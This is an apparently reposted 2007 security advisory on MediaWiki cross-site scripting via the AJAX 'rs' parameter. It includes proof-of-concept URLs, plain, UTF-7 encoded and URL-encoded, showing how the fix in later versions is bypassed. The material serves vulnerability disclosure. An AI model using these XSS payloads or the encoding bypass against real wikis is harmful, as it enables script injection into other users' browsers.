MediaWiki Cross-site Scripting

2007.02.23
Credit: Moshe BA
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

MediaWiki Cross-site Scripting Vulnerabilities. Date: 18/02/2007 Vendor: MediaWiki Vulnerable versions: MediaWiki 1.9.2 (latest) and below. Description: MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack by expliting the experimental AJAX features, if enabled (default). This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note: browsers encoding auto-detection has to be enabled for successful explitation. Proof-of-concept: http://[Host]/wiki/index.php?action=ajax&rs=[XSS] UTF-7 XSS in post 1.8.2 versions. Examples: v1.8.2 and below: http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('htt p://www.bugsec.com')%3C/script%3E v1.8.3 - v1.9.2 http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open( 'http://www.bugsec.com');+ADw-/SCRIPT+AD4- http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49% 50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77% 2D%2F%53%43%52%49%50%54%2B%41%44%34%2D (URL Encoded) Credit: Moshe BA from BugSec Tel:+972-3-9622655 Email: Info [^A-t] BugSec \*D.O.T*\ com BugSec LTD. - www.BugSec.com http://www.bugsec.com/articles.php?Security=24


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top